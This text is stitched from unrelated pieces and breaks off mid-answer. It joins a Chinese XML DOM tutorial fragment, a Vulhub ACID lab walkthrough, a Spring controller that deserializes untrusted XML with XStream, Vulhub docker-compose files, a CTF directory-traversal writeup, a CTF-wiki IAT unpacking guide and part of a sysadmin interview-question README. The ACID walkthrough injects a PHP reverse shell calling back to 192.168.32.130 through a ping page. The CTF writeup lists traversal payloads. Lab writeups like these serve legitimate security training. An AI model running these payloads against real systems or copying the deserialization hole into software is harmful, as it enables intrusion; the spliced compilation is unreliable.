ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("GET","note.xml",false); xmlhttp.send(); xmlDoc=xmlhttp.responseXML; document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue; document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue; document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue; </script> </body> </html> ``` 如需从上面的 XML 文件("note.xml")的 `<to>` 元素中提取文本 "Tove",语法是: ``` getElementsByTagName("to")[0].childNodes[0].nodeValue ``` 请注意,即使 XML 文件只包含一个 `<to>` 元素,你仍然必须指定数组索引 `[0]`。这是因为 `getElementsByTagName()` 方法返回一个数组。 **加载一个 XML 字符串 - 跨浏览器实例** 下面的实例把 XML 字符串解析到 XML DOM 对象中,然后通过 JavaScript 提取一些信息: ```html <!DOCTYPE html> <html> <body> <h1>W3Cschool Internal Note</h1> <div> <b>To:</b> <span id="to"></span><br> <b>From:</b> <span id="from"></span><br> <b>Message:</b> <span id="message"></span> </div> <script> txt="<note>"; txt=txt+"<to>Tove</to>"; txt=txt+"<from>Jani</from>"; txt=txt+"<heading>Reminder</heading>"; txt=txt+"<body>Don't forget me this weekend!</body>"; txt=txt+"</note>"; if (window.DOMParser) { parser=new DOMParser(); xmlDoc=parser.parseFromString(txt,"text/xml"); } else 
// Internet Explorer { xmlDoc=new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false; xmlDoc.loadXML(txt); } document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue; document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue; document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue; </script> </body> </html> ``` --- ## Source & Reference - [XML 教程](https://www.runoob.com/xml/xml-tutorial.html)
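As a small addendum: the same `note.xml` used throughout this tutorial can of course also be parsed outside the browser. Here is a minimal sketch with Python's built-in ElementTree (the XML is embedded as bytes so the encoding declaration is honored):

```python
#!/usr/bin/env python3
# Parsing the tutorial's note document with Python's built-in
# ElementTree instead of the JavaScript DOM shown above.
import xml.etree.ElementTree as ET

xml_bytes = b"""<?xml version="1.0" encoding="UTF-8"?>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>"""

note = ET.fromstring(xml_bytes)
print("To:", note.find("to").text)         # -> Tove
print("From:", note.find("from").text)     # -> Jani
print("Message:", note.find("body").text)  # -> Don't forget me this weekend!
```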
# ACID: SERVER

> https://download.vulnhub.com/acid/Acid.rar

Target IP: `192.168.32.205`

Scan the externally exposed ports and services:

```
┌──(root💀kali)-[/tmp]
└─# nmap -p 1-65535 -sV 192.168.32.205
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 01:37 EDT
Nmap scan report for 192.168.32.205
Host is up (0.0012s latency).
Not shown: 65534 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:FF:21:11 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds
```

Visit port 33447:

![image-20220906134133510](../../.gitbook/assets/image-20220906134133510.png)

Visit the `/Challenge` directory:

![image-20220906134208898](../../.gitbook/assets/image-20220906134208898.png)

Brute-force directories:

```
┌──(root💀kali)-[/tmp]
└─# gobuster dir -u http://192.168.32.205:33447/Challenge -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.32.205:33447/Challenge
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/06 01:43:22 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 1333]
/css                  (Status: 301) [Size: 333] [--> http://192.168.32.205:33447/Challenge/css/]
/includes             (Status: 301) [Size: 338] [--> http://192.168.32.205:33447/Challenge/includes/]
/js                   (Status: 301) [Size: 332] [--> http://192.168.32.205:33447/Challenge/js/]
/include.php          (Status: 302) [Size: 0] [--> protected_page.php]
/styles               (Status: 301) [Size: 336] [--> http://192.168.32.205:33447/Challenge/styles/]
/error.php            (Status: 200) [Size: 309]
/cake.php             (Status: 200) [Size: 496]
/hacked.php           (Status: 302) [Size: 0] [--> protected_page.php]
/less                 (Status: 301) [Size: 334] [--> http://192.168.32.205:33447/Challenge/less/]
```

Visiting `/cake.php` reveals `/Magic_Box/`:

![image-20220906134430868](../../.gitbook/assets/image-20220906134430868.png)

Visit `/Magic_Box/`:

![image-20220906134528635](../../.gitbook/assets/image-20220906134528635.png)

Continue brute-forcing paths:

```
┌──(root💀kali)-[/tmp]
└─# gobuster dir -u http://192.168.32.205:33447/Challenge/Magic_Box/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.32.205:33447/Challenge/Magic_Box/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/06 01:45:48 Starting gobuster in directory enumeration mode
===============================================================
/low.php              (Status: 200) [Size: 0]
/command.php          (Status: 200) [Size: 594]
/proc                 (Status: 301) [Size: 344] [--> http://192.168.32.205:33447/Challenge/Magic_Box/proc/]
```

This uncovers a ping command-execution page.
![image-20220906134739504](../../.gitbook/assets/image-20220906134739504.png)

Adding one more `/` makes the page accessible:

![image-20220906134919641](../../.gitbook/assets/image-20220906134919641.png)

Enter a reverse shell in the input box:

```
0;php -r '$sock=fsockopen("192.168.32.130",12345);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Look for interesting files:

![image-20220906135710560](../../.gitbook/assets/image-20220906135710560.png)

![image-20220906135921203](../../.gitbook/assets/image-20220906135921203.png)

```
┌──(root💀kali)-[/tmp]
└─# nc -lvp 1234 > hint.pcapng
listening on [any] 1234 ...
192.168.32.205: inverse host lookup failed: Unknown host
connect to [192.168.32.130] from (UNKNOWN) [192.168.32.205] 41308
```

Analyzing the capture yields the following conversation:

```
heya
hello
What was the name of the Culprit ???
saman and now a days he's known by the alias of 1337hax0r
oh...Fuck....Great...Now, we gonna Catch Him Soon :D
Yes .. We have to !! The mad bomber is on a rage
Ohk...cya
Over and Out
```

![image-20220906140033419](../../.gitbook/assets/image-20220906140033419.png)

Privilege escalation with `su` succeeds:

![image-20230208133555839](../../.gitbook/assets/image-20230208133555839.png)
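A note on the reverse-shell step above: a listener must already be running on the attacker machine (192.168.32.130, port 12345) before the payload is submitted. `nc -lvp 12345` is the usual choice; purely as an illustration, a rough Python stand-in could look like this (a sketch, not a hardened tool):

```python
#!/usr/bin/env python3
# Stand-in for `nc -lvp 12345`: accept the PHP reverse shell triggered
# above and relay its output to our terminal, our keystrokes to it.
import socket
import sys
import threading

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 12345))
srv.listen(1)
print("listening on 0.0.0.0:12345 ...")
conn, addr = srv.accept()
print("connection from %s:%d" % addr)

def relay_output():
    # remote shell output -> our terminal
    while True:
        data = conn.recv(4096)
        if not data:
            break
        sys.stdout.buffer.write(data)
        sys.stdout.flush()

threading.Thread(target=relay_output, daemon=True).start()

# our keystrokes -> remote shell
for line in sys.stdin:
    conn.sendall(line.encode())
```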
package org.vulhub.xstreamsample;

import com.thoughtworks.xstream.XStream;

import org.springframework.web.bind.annotation.*;

@RestController
public class HelloController {

    @GetMapping(value = "/")
    public String hello() {
        return "hello, input your information please.";
    }

    @PostMapping(value = "/")
    public String read(@RequestBody String data) {
        XStream xs = new XStream();
        xs.processAnnotations(User.class);
        User user = (User) xs.fromXML(data);
        return "My name is " + user.getName() + ", I am " + user.getAge().toString() + " years old.";
    }
}
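# --- Example request against the controller above (a sketch) ---------------
# The User class is not shown here, so the element and field names below are
# assumptions: XStream accepts the fully-qualified class name as the root
# element by default, name/age are inferred from the getters, and 8080 is
# the Spring Boot default port.
#
# import requests  # third-party: pip install requests
#
# payload = """<org.vulhub.xstreamsample.User>
#   <name>Tove</name>
#   <age>18</age>
# </org.vulhub.xstreamsample.User>"""
#
# r = requests.post("http://localhost:8080/", data=payload,
#                   headers={"Content-Type": "application/xml"})
# print(r.text)  # expected: "My name is Tove, I am 18 years old."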
version: '2'
services:
  saltstack:
    image: vulhub/saltstack:2019.2.3
    ports:
      - "8000:8000"
      - "4505:4505"
      - "4506:4506"
      - "2222:22"
# Status page 10 Points ## Solution We get a page titled "Find the flag on the server" which is displaying some usage stats: ``` MemTotal: 32891152 kB MemFree: 5626532 kB MemAvailable: 27921752 kB ``` It's possible to click a "refresh" button to refresh the stats. Clicking the button triggers a request to `refresh.ajax`. The request is: ```json [{"l":3,"p":""}] ``` The response is of the form: ```json { "result": [ "MemTotal: 32891152 kB", "MemFree: 5633468 kB", "MemAvailable: 27945728 kB" ] } ``` What if we change `l` to something other than `3`? We get: ```json { "result": [ "MemTotal: 32891152 kB", "MemFree: 9702228 kB", "MemAvailable: 28062364 kB", "Buffers: 1143108 kB", "Cached: 3573264 kB", "SwapCached: 0 kB", "Active: 6266240 kB", "Inactive: 4092732 kB", "Active(anon): 3037784 kB", "Inactive(anon): 6660 kB", "Active(file): 3228456 kB", "Inactive(file): 4086072 kB", "Unevictable: 0 kB", "Mlocked: 0 kB", "SwapTotal: 0 kB", "SwapFree: 0 kB", "Dirty: 564 kB", "Writeback: 0 kB", "AnonPages: 5640504 kB", "Mapped: 523372 kB", "Shmem: 12876 kB", "KReclaimable: 11512080 kB", "Slab: 12317368 kB", "SReclaimable: 11512080 kB", "SUnreclaim: 805288 kB", "KernelStack: 44640 kB", "PageTables: 61620 kB", "NFS_Unstable: 0 kB", "Bounce: 0 kB", "WritebackTmp: 0 kB", "CommitLimit: 16445576 kB", "Committed_AS: 27131012 kB", "VmallocTotal: 34359738367 kB", "VmallocUsed: 55848 kB", "VmallocChunk: 0 kB", "Percpu: 235136 kB", "AnonHugePages: 157696 kB", "ShmemHugePages: 0 kB", "ShmemPmdMapped: 0 kB", "FileHugePages: 0 kB", "FilePmdMapped: 0 kB", "HugePages_Total: 0", "HugePages_Free: 0", "HugePages_Rsvd: 0", "HugePages_Surp: 0", "Hugepagesize: 2048 kB", "Hugetlb: 0 kB", "DirectMap4k: 1768648 kB", "DirectMap2M: 31784960 kB", "DirectMap1G: 2097152 kB" ] } ``` That looks like the result of `cat /proc/meminfo`. Can we perform directory traversal to cat a different file? | What we send | What we get back | | ----------------------------------- | ------------------------------------------------------------------- | | `[{"l":150,"p":"./../version"}]` | `Linux version 5.4.89+ (builder@000b7ffa02b3) (Chromium OS 11.0_pre391452_p20200527-r7 clang version 11.0.0 (/var/cache/chromeos-cache/distfiles/host/egit-src/llvm-project a8e5dcb072b1f794883ae8125fb08c06db678d56)) #1 SMP Sat Feb 13 19:45:14 PST 2021"` | | `[{"l":150,"p":"./../self/cwd"}]` | `{"result":["cloud-grid-runner.js","config","create-app.js","factories.js","g","jest.config.js","jest.e2e.config.js","jest.fakes.config.js","jest.it.config.js","jest.it.data.config.js","jest.it.parallel.config.js","node_modules","package-lock.json","package.json","src"]}` | | `[{"l":150,"p":"./../self/src"}]` | `{"result":["bi-logging","config","handlers","init","js-server-side","libs","middleware","npm-support","preload","runtime-env","tracing.js","uncaught-exception-handler.js"]}` | | `[{"l":150,"p":"./../self/cwd/src/../../../../"}]` | `{"result":["etc","lib","lib64","node","proc","sys","user-code","usr"]}` | | `[{"l":150,"p":"./../self/cwd/src/../../../../user-code"}]` | `{"result":["d1r3c70rY_7R4v3R54L","public"]}` |
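The same probing can be scripted instead of replayed in the browser. A minimal sketch with Python's `requests` (the challenge host below is a placeholder):

```python
#!/usr/bin/env python3
# Reproducing the refresh.ajax requests from this writeup without a browser.
import requests  # third-party: pip install requests

URL = "https://challenge.example/refresh.ajax"  # placeholder host

def leak(path, lines=150):
    # The endpoint takes a JSON list with "l" (line count) and "p" (path).
    body = [{"l": lines, "p": path}]
    return requests.post(URL, json=body).json()["result"]

print(leak("", lines=3))                                 # default /proc/meminfo stats
print(leak("./../version"))                              # kernel version string
print(leak("./../self/cwd/src/../../../../user-code"))   # directory listing
```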
version: '2'
services:
  flink:
    image: vulhub/flink:1.11.2
    command: jobmanager
    ports:
      - "8081:8081"
      - "6123:6123"
### Manually locating the IAT and rebuilding it with ImportREC

The sample program can be downloaded from this link: [manually_fix_iat.zip](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/unpack/example/manually_fix_iat.zip)

When unpacking we usually rely on ImportREC's built-in `IAT auto search`, but how do we proceed if we want to find the IAT address manually and dump it ourselves?

First, using the ESP law, we can quickly jump to `OEP: 00401110`. Right-click and choose `Search for -> All intermodular calls`.

The list of called functions is displayed; double-click one of them (note that what we double-click here should be a function of the program itself, not a system function).

We arrive at the call site of that function.

Right-click and choose `Follow` to enter the function.

Then right-click again and choose `Follow in Dump -> Memory address`.

Because hexadecimal values are shown here, which is inconvenient to read, we can right-click in the data window and choose `Long -> Address`, which displays the function names instead.

Note that we have to scroll up to the start of the IAT. We can see that the first function entry is `kernel.AddAtomA` at address `004050D8`; scrolling down, the last function is `user32.MessageBoxA`. Now calculate the size of the whole IAT: at the bottom of OD it shows `Block size: 0x7C`, so the whole IAT block is `0x7C` bytes.

Open `ImportREC`, select the program we are debugging, then enter `OEP:1110, RVA:50D8, SIZE:7C` and click `Get Imports`.

In the import table window, right-click and choose `Advanced commands -> Select code block`. In the popup window choose a full dump and save it as `dump.exe`.

After the dump is complete, choose `Fix Dump`, pointing it at the `dump.exe` we just produced, which yields `dump_.exe`. The unpacking is now complete.
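Once `dump_.exe` has been produced, the rebuilt import table can be sanity-checked programmatically. Below is a minimal sketch using the third-party `pefile` module (an extra verification step, not part of the original workflow); if the rebuild worked, the listing should run from the `kernel32` entries such as `AddAtomA` through `user32.MessageBoxA`:

```python
#!/usr/bin/env python
# Verify the rebuilt import table of the fixed dump with pefile
# (third-party: pip install pefile).
import pefile

pe = pefile.PE("dump_.exe")
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    print(entry.dll.decode())
    for imp in entry.imports:
        name = imp.name.decode() if imp.name else "(ordinal %d)" % imp.ordinal
        print("  0x%08x  %s" % (imp.address, name))
```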
<p align="center"> <a href="https://github.com/trimstray/test-your-sysadmin-skills"> <img src="https://github.com/trimstray/test-your-sysadmin-skills/blob/master/static/img/sysadmin_preview.png" alt="Master"> </a> </p> <br> <p align="center">:star:</p> <p align="center">"<i>A great Admin doesn't need to know everything, but they should be able to come up with amazing solutions to impossible projects.</i>" - cwheeler33 (ServerFault)</p> <p align="center">:star:</p> <p align="center">"<i>My skills are making things work, not knowing a billion facts. [...] If I need to fix a system I’ll identify the problem, check the logs and look up the errors. If I need to implement a solution I’ll research the right solution, implement and document it, the later on only really have a general idea of how it works unless I interact with it frequently... it’s why it’s documented.</i>" - Sparcrypt (Reddit)</p> <br> <p align="center"> <a href="https://github.com/trimstray/test-your-sysadmin-skills/pulls"> <img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests"> </a> <a href="LICENSE.md"> <img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License"> </a> </p> <p align="center"> <a href="https://twitter.com/trimstray" target="_blank"> <img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter"> </a> </p> <div align="center"> <sub>Created by <a href="https://twitter.com/trimstray">trimstray</a> and <a href="https://github.com/trimstray/test-your-sysadmin-skills/graphs/contributors">contributors</a> </div> <br> **** <br> :information_source: &nbsp;This project contains **284** test questions and answers that can be used as a test your knowledge or during an interview/exam for position such as **Linux (\*nix) System Administrator**. :heavy_check_mark: &nbsp;The answers are only **examples** and do not exhaust the whole topic. Most of them contains **useful resources** for a deeper understanding. :warning: &nbsp;Questions marked **`***`** don't have answer yet or answer is incomplete - **make a pull request to add them**! :traffic_light: &nbsp;If you find something which doesn't make sense, or something doesn't seem right, **please make a pull request** and please add valid and well-reasoned explanations about your changes or comments. :books: &nbsp;In order to improve your knowledge/skills please see [devops-interview-questions](https://github.com/bregman-arie/devops-interview-questions). It looks really interesting. <br> <p align="center"> » <b><code><a href="https://github.com/trimstray/test-your-sysadmin-skills/issues">All suggestions are welcome</a></code></b> « </p> <br> ## Table of Contents | <b><u>The type of chapter</u></b> | <b><u>Number of questions</u></b> | <b><u>Short description</u></b> | | :--- | :--- | :--- | | <b>[Introduction](#introduction)</b> ||| | :small_orange_diamond: [Simple Questions](#simple-questions) | 14 questions | Relaxed, fun and simple - are great for starting everything. | | <b>[General Knowledge](#general-knowledge)</b> ||| | :small_orange_diamond: [Junior Sysadmin](#junior-sysadmin) | 65 questions | Reasonably simple and straight based on basic knowledge. | | :small_orange_diamond: [Regular Sysadmin](#regular-sysadmin) | 94 questions | The mid level of questions if that you have sound knowledge. | | :small_orange_diamond: [Senior Sysadmin](#senior-sysadmin) | 99 questions | Hard questions and riddles. Check it if you want to be good. 
| | <b>[Secret Knowledge](#secret-knowledge)</b> || | :small_orange_diamond: [Guru Sysadmin](#guru-sysadmin) | 12 questions | Really deep questions are to get to know Guru Sysadmin. | <br> ## <a name="introduction">Introduction</a> ### :diamond_shape_with_a_dot_inside: <a name="simple-questions">Simple Questions</a> - <b>What did you learn this week?</b> - <b>What excites or interests you about the sysadmin world?</b> - <b>What is a recent technical challenge you experienced and how did you solve it?</b> - <b>Tell me about the last major project you finished.</b> - <b>Do you contribute to any open source projects?</b> - <b>Describe the setup of your homelab.</b> - <b>What personal achievement are you most proud of?</b> - <b>Tell me about the biggest mistake you've made. How would you do it differently today?</b> - <b>What software tools are you going to install on the first day at a new job?</b> - <b>Tell me about how you manage your knowledge database (e.g. wikis, files, portals).</b> - <b>What news sources do you check daily? (sysadmin, security-related or other)</b> - <b>Your NOC team has a new budget for sysadmin certifications. What certificate would you like and why?</b> - <b>How do you interact with developers: *us vs. them* or *all pulling together with a different approach*?</b> - <b>Which sysadmin question would you ask, if you were interviewing me, to know, how good I'm with non-standard situations?</b> ## <a name="general-knowledge">General Knowledge</a> ### :diamond_shape_with_a_dot_inside: <a name="junior-sysadmin">Junior Sysadmin</a> ###### System Questions (37) <details> <summary><b>Give some examples of Linux distribution. What is your favorite distro and why?</b></summary><br> - Red Hat Enterprise Linux - Fedora - CentOS - Debian - Ubuntu - Mint - SUSE Linux Enterprise Server (SLES) - SUSE Linux Enterprise Desktop (SLED) - Slackware - Arch - Kali - Backbox My favorite Linux distribution: - **Arch Linux**, which offers a nice minimalist base system on which one can build a custom operating system. The beauty of it too is that it has the Arch User Repository (AUR), which when combined with its official binary repositories allows it to probably have the largest repositories of any distribution. Its packaging process is also very simple, which means if one wants a package not in its official repositories or the AUR, it should be easy to make it for oneself. - **Linux Mint**, which is also built from Ubuntu LTS releases, but features editions featuring a few different desktop environments, including Cinnamon, MATE and Xfce. Mint is quite polished and its aesthetics are rather appealing, I especially like its new icon theme, although I do quite dislike its GTK+ theme (too bland to my taste). I’ve also found a bug in its latest release Mint 19, that is getting quite irritating as I asked for with it over a fortnight ago on their forums and I have received no replies so far and it is a bug that makes my life on it more difficult. - **Kali Linux**, is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. 
Useful resources:

- [List of Linux distributions](https://en.wikipedia.org/wiki/List_of_Linux_distributions)
- [What is your favorite Linux distro and why?](https://www.quora.com/What-is-your-favorite-Linux-distro-and-why)

</details>

<details>
<summary><b>What are the differences between Unix, Linux, BSD, and GNU?</b></summary><br>

**GNU** isn't really an OS. It's more of a set of rules or philosophies that govern free software, that at the same time gave birth to a bunch of tools while trying to create an OS. So **GNU** tools are basically open versions of tools that already existed, but were reimplemented to conform to principles of open software. **GNU/Linux** is a mesh of those tools and the **Linux kernel** to form a complete OS, but there are other GNUs, e.g. **GNU/Hurd**.

**Unix** and **BSD** are "older" implementations of POSIX that are at various levels of "closed source". **Unix** is usually totally closed source, but there are as many flavors of **Unix** as there are of **Linux** (if not more). **BSD** is not usually considered "open", but it was considered to be very open when it was released. Its licensing also allowed for commercial use with far fewer restrictions than the more "open" licenses of the time allowed.

**Linux** is the newest of the four. Strictly speaking, it's "just a kernel"; however, in general, it's thought of as a full OS when combined with GNU Tools and several other core components.

The main governing differences between these are their ideals. **Unix**, **Linux**, and **BSD** have different ideals that they implement. They are all POSIX, and are all basically interchangeable. They do solve some of the same problems in different ways. So, other than ideals and how they choose to implement POSIX standards, there is little difference.

For more info I suggest you read a brief article on the creation of **GNU**, **OSS**, **Linux**, **BSD**, and **UNIX**. They will be slanted towards their individual ideas, but those articles should give you a better idea of the differences.

Useful resources:

- [What is the difference between Unix, Linux, BSD and GNU? (original)](https://unix.stackexchange.com/questions/104714/what-is-the-difference-between-unix-linux-bsd-and-gnu)
- [The Great Debate: Is it Linux or GNU/Linux?](https://www.howtogeek.com/139287/the-great-debate-is-it-linux-or-gnulinux/)

</details>

<details>
<summary><b>What is a CLI? Tell me about your favorite CLI tools, tips, and hacks.</b></summary><br>

**CLI** is an acronym for Command Line Interface or Command Language Interpreter. The command line is one of the most powerful ways to control your system/computer. In Unix-like systems, the **CLI** is the interface through which a user can type commands for the system to execute. The **CLI** is very powerful, but it is not very error-tolerant.

The **CLI** allows you to manipulate your system's internals and code in a much more fine-tuned way. It offers greater flexibility and control than a GUI, regardless of which OS is used. Many programs that you might want to use in your software that are hosted on, say, GitHub also require running some commands on the **CLI** in order to get them running.

**My favorite tools**

- `screen` - a free terminal multiplexer; I can start a session and my terminals are saved even when the connection is lost, so I can resume later or from home
- `ssh` - the most valuable all-round command to learn; I can use it to do some amazing things:

  * mount a file system over the internet with `sshfs`
  * forward commands: run `rsync` against a host with no `rsync` daemon by starting one itself via ssh
  * run in batch files: I can redirect the output from the remote command and use it within a local batch file

- `vi/vim` - the most popular and powerful text editor; it's universal and works very fast, even on large files
- `bash-completion` - contains a number of predefined completion rules for the shell

**Tips & Hacks**

- search the command history with `CTRL + R`
- `popd/pushd` and other shell builtins which allow you to manipulate the directory stack
- editing keyboard shortcuts like `CTRL + U` and `CTRL + E`
- combinations that will be auto-expanded:

  * `!*` - all arguments of the last command
  * `!!` - the whole of the last command
  * `!ssh` - the last command starting with ssh

Useful resources:

- [Command Line Interface Definition](http://www.linfo.org/command_line_interface.html)
- [What is your single most favorite command-line trick using Bash?](https://stackoverflow.com/questions/68372/what-is-your-single-most-favorite-command-line-trick-using-bash/69716)
- [What are your favorite command line features or tricks?](https://unix.stackexchange.com/questions/6/what-are-your-favorite-command-line-features-or-tricks)

</details>

<details>
<summary><b>What is your favorite shell and why?</b></summary><br>

**BASH** is my favorite. It's really a preferential kind of thing, where I love the syntax and it just "clicks" for me. The input/output redirection syntax (`>>`, `<<`, `2>&1`, `2>`, `1>`, etc.) is similar to C++, which makes it easier for me to recognize.

I also like the **ZSH** shell, because it is much more customizable than **BASH**. It has the Oh-My-Zsh framework, powerful context-based tab completion, pattern matching/globbing on steroids, loadable modules and more.

Useful resources:

- [Comparison of command shells](https://en.wikipedia.org/wiki/Comparison_of_command_shells)

</details>

<details>
<summary><b>How do you get help on the command line? ***</b></summary><br>
- `man` [commandname] can be used to see a description of a command (ex.: `man less`, `man cat`)
- `-h` or `--help` - some programs implement these parameters and print short usage instructions when passed them (ex.: `python -h` and `python --help`)

</details>

<details>
<summary><b>Your first 5 commands on a *nix server after login.</b></summary><br>

- `w` - a lot of great information in there, together with the server uptime
- `top` - you can see all running processes, then order them by CPU, memory utilization and more
- `netstat` - to know on what port and IP your server is listening, and what processes are using those
- `df` - reports the amount of available disk space being used by file systems
- `history` - tells you what was previously run by the user you are currently connected to

Useful resources:

- [First 5 Commands When I Connect on a Linux Server (original)](https://www.linux.com/blog/first-5-commands-when-i-connect-linux-server)

</details>

<details>
<summary><b>What do the fields in <code>ls -al</code> output mean?</b></summary><br>

In the order of output:

```bash
-rwxrw-r-- 1 root root 2048 Jan 13 07:11 db.dump
```

- file permissions,
- number of links,
- owner name,
- owner group,
- file size,
- time of last modification,
- file/directory name

File permissions are displayed as follows:

- the first character is `-`, `l` or `d`; `d` indicates a directory, `-` represents a file, `l` is a symlink (or soft link) - a special type of file
- three sets of characters, three times, indicating permissions for owner, group and other:
  - `r` = readable
  - `w` = writable
  - `x` = executable

In your example `-rwxrw-r--`, this means the line displayed is:

- a regular file (displayed as `-`)
- readable, writable and executable by owner (`rwx`)
- readable, writable, but not executable by group (`rw-`)
- readable but not writable or executable by other (`r--`)

Useful resources:

- [What do the fields in ls -al output mean? (original)](https://unix.stackexchange.com/questions/103114/what-do-the-fields-in-ls-al-output-mean)

</details>

<details>
<summary><b>How do you get a list of logged-in users?</b></summary><br>

For a summary of logged-in users, including each login of a username, the terminal users are attached to, the date/time they logged in, and possibly the computer from which they are making the connection, enter:

```bash
# It uses /var/run/utmp and /var/log/wtmp files to get the details.
who
```

For extensive information, including username, terminal, IP number of the source computer, the time the login began, any idle time, process CPU cycles, job CPU cycles, and the currently running command, enter:

```bash
# It uses /var/run/utmp, and their processes /proc.
w
```

Also important: to display a list of last logged-in users, enter:

```bash
# It uses /var/log/wtmp.
last
```

Useful resources:

- [4 Ways to Identify Who is Logged-In on Your Linux System](https://www.thegeekstuff.com/2009/03/4-ways-to-identify-who-is-logged-in-on-your-linux-system/)

</details>

<details>
<summary><b>What is the advantage of executing the running processes in the background? How can you do that?</b></summary><br>

The most significant advantage of executing processes in the background is that you can work on other tasks simultaneously while they run. So, more processes can be completed in the background while you are working on different processes. It can be achieved by adding the special character `&` at the end of the command.
Generally, applications that take too long to execute and don't require user interaction are sent to the background so that we can continue our work in the terminal. For example, if you want to download something in the background, you can:

```bash
wget https://url-to-download.com/download.tar.gz &
```

When you run the above command you get the following output:

```bash
[1] 2203
```

Here 1 is the serial number of the job and 2203 is the PID of the job.

You can see the jobs running in the background using the following command:

```bash
jobs
```

When you execute a job in the background it gives you the PID of the job; you can kill a job running in the background using the following command:

```bash
kill PID
```

Replace PID with the PID of the job. If you have only one job running you can bring it to the foreground using:

```bash
fg
```

If you have multiple jobs running in the background you can bring any job to the foreground using:

```bash
fg %#
```

Replace the `#` with the serial number of the job.

Useful resources:

- [How do I run a Unix process in the background?](https://kb.iu.edu/d/afnz)
- [Job Control Commands](http://tldp.org/LDP/abs/html/x9644.html)
- [What is/are the advantage(s) of running applications in background?](https://unix.stackexchange.com/questions/162186/what-is-are-the-advantages-of-running-applications-in-backgound)

</details>

<details>
<summary><b>Before you can manage processes, you must be able to identify them. Which tools will you use? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Running commands as the root user. Is it a good or bad practice?</b></summary><br>

Running (everything) as root is bad because:

- **Stupidity**: nothing prevents you from making a careless mistake. If you try to change the system in any potentially harmful way, you need to use sudo, which ensures a pause (while you're entering the password) to ensure that you aren't about to make a mistake.
- **Security**: harder to hack if you don't know the admin user's login account. root means you already have one half of the working set of admin credentials.
- **You don't really need it**: if you need to run several commands as root, and you're annoyed by having to enter your password several times when `sudo` has expired, all you need to do is `sudo -i` and you are now root. Want to run some commands using pipes? Then use `sudo sh -c "command1 | command2"`.
- **You can always use it in the recovery console**: the recovery console allows you to recover from a major mistake, or fix a problem caused by an app (which you still had to run as `sudo`). Ubuntu doesn't have a password for the root account in this case, but you can search online for changing that - this will make it harder for anyone that has physical access to your box to be able to do harm.

Useful resources:

- [Why is it bad to log in as root? (original)](https://askubuntu.com/questions/16178/why-is-it-bad-to-log-in-as-root)
- [What's wrong with always being root?](https://serverfault.com/questions/57962/whats-wrong-with-always-being-root)
- [Why you should avoid running applications as root](https://bencane.com/2012/02/20/why-you-should-avoid-running-applications-as-root/)

</details>

<details>
<summary><b>How to check memory stats and CPU stats?</b></summary><br>

You'd use `top/htop` for both. Using the `free` and `vmstat` commands we can display the physical and virtual memory statistics respectively. With the help of the `sar` command we can see CPU utilization and other stats (but `sar` isn't even installed on most systems).
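As a quick illustration, here are a few typical invocations (a minimal sketch; exact flags can vary slightly between distributions, and `sar` requires the sysstat package):

```bash
# Physical and swap memory usage, human readable
free -h

# Virtual memory statistics: 5 samples, 1 second apart
vmstat 1 5

# One non-interactive snapshot of top (load average, tasks, CPU, memory)
top -b -n 1 | head -n 5

# CPU utilization: 3 samples, 1 second apart (from the sysstat package)
sar -u 1 3
```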
Useful resources:

- [How do I Find Out Linux CPU Utilization?](https://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html)
- [16 Linux server monitoring commands you really need to know](https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html)

</details>

<details>
<summary><b>What is load average?</b></summary><br>

Linux **load averages** are "system load averages" that show the running thread (task) demand on the system as an average number of running plus waiting threads. This measures demand, which can be greater than what the system is currently processing. Most tools show three averages, for 1, 5, and 15 minutes.

